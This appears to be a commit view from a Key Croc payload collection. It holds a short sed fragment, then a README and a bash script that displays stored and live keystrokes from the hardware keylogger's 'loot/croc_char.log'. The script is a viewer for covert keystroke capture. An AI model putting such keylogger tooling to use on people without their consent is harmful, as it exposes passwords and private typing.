s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column. s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column.
11{G;s/\n\S+//} - 11{G;s/\n\S+//}
11{..} executes the commands between the ellipses on the eleventh line of config.txt. 11{..} executes the commands between the ellipses on the eleventh line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator. G append the contents of hold space to the pattern space using a newline as a separator.

View File

@ -0,0 +1,29 @@
# Croc_Live
Script Description: Keyboard Activity Monitor
The following script serves as a tool to monitor and display keyboard activity, showing both previous keystrokes and live keystrokes in real-time. It operates in the terminal environment and relies on the presence of certain log files.
- Display Previous Keystrokes:
- The script initiates by printing a message to the terminal, indicating that the previously recorded keystrokes are about to be displayed.
- It then searches for files named "croc_char.log" within the current directory and its subdirectories.
- All found log files are concatenated and their contents are displayed, revealing the previous keystrokes recorded in those files.
- Waiting for Keyboard Activity:
- After displaying the previous keystrokes, the script enters a loop, continuously checking for the existence of the file "loot/croc_char.log".
- During this loop, it prints the message "Waiting for keyboard activity" and clears the line with each iteration. This creates an interactive waiting experience for users until keyboard activity is detected.
- Show Live Keystrokes:
- Once the file "loot/croc_char.log" is present (indicating keyboard activity has started), the script proceeds.
- A 1-second pause occurs to allow time for the system to update or log any new keyboard activity.
- The terminal screen is then cleared to prepare for the display of live keystrokes.
- A message is shown to inform users that live keystrokes will be displayed.
- The script uses the tail -f command, which continuously follows and outputs new content appended to the "loot/croc_char.log" file. This effectively presents live keystrokes in real-time.
- Usage:
Place the croc_live.sh file in keycroc tools folder.
To utilize this script, simply execute it in the terminal environment. Make sure that the required log files, specifically "croc_char.log" and "loot/croc_char.log," are available and accessible within the current directory. Simply type "bash udisk/tools/croc_live.sh" in terminal.
Please note that this script may have specific use cases, such as monitoring and capturing keyboard activity during specific sessions or tasks. Always ensure you have the necessary permissions to read and access the log files being monitored.

View File

@ -0,0 +1,19 @@
#!/bin/bash
# Title: Croc_Live
# Description: Live keystrokes in real-time. It operates in the terminal environment ( bash udisk/tools/croc_live.sh )
# Author: spywill
# Version: 1.0
# Category: Key Croc
echo -ne "\n\nPrevious keystrokes:\n\n"
find . -type f -name "croc_char.log" -exec cat {} +
until [ -f loot/croc_char.log ]; do
echo -ne "Waiting for keyboard activity\033[0K\r"
done
sleep 1
printf '\033[H\033[2J'
echo -ne "\n\nLive keystrokes:\n\n"
tail -f loot/croc_char.log